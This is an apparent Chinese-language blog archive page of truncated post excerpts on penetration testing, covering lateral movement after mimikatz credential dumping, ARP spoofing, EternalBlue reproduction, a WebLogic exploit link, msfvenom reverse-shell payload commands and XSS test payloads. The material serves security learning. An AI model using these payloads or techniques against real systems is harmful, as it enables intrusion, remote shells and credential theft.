11 2020 档案
摘要:#知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其
阅读全文
摘要:https://github.com/21superman/weblogic_exploit/releases/tag/1.0
阅读全文
摘要:1-横向渗透明文传递at&schtasks思路 在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。 获取到某域主机权限 ->minikatz得到密码(
阅读全文
摘要:局域网攻击 ARP欺骗 arp地址转换协议,工作在数据链路层,IP和mac地址的转换 arp -a arp表 tcp/ip 五层: 物理层 数据链路层 网络层 传输层 应用层 arping 实现 arp攻击 1 #Arping简要使用 2 -d arp缓冲清理 3 -A:与-U参数类似,但是使用的是
阅读全文
摘要:永恒之蓝 MS17-010漏洞复现 一:简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wa
阅读全文
摘要:长亭(驻场): 1.说一下文件包含的原理和产生的条件?2.上一家为什么离职(必问题)?3.sqlmap 测试一个post注入点应该怎么测?3.xss 的种类和原理?怎么测试一个地方有没有xss?4.xss和csrf的区别?5.python 常见的一些库?建立http的库有那些?6.IPS、IDS、W
阅读全文
摘要:Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w
阅读全文
摘要:常用测试语句: <script language='javascript'>alert('test!');</script> <script>alert('test')</script> <svg/onload=alert(1)> "><svg/onload=alert(1)// onfocus=j
阅读全文
摘要:DNS收集 kail whois 命令收集 例子:whois baidu.com 尽量查根域名 站长之家的 whois 查询 DNS解析IP地址 ping命令 kail :nslookup工具 :dig工具 :dnsenum工具 自动检测域传送漏洞(优选) 站长之家中的工具 CDN加速问题 本意是进
阅读全文
摘要:#案例给到的知识点总结如下: 案例1:如何判断使用哪种溢出漏洞?漏洞那里找? 信息收集-补丁筛选-利用MSF或特定EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan对比,exp在那里获取? 案例2:如何判断使用哪种数据库提权?数据库提权利用条件? MSF结合云服务器搭建组合
阅读全文
浙公网安备 33010602011771号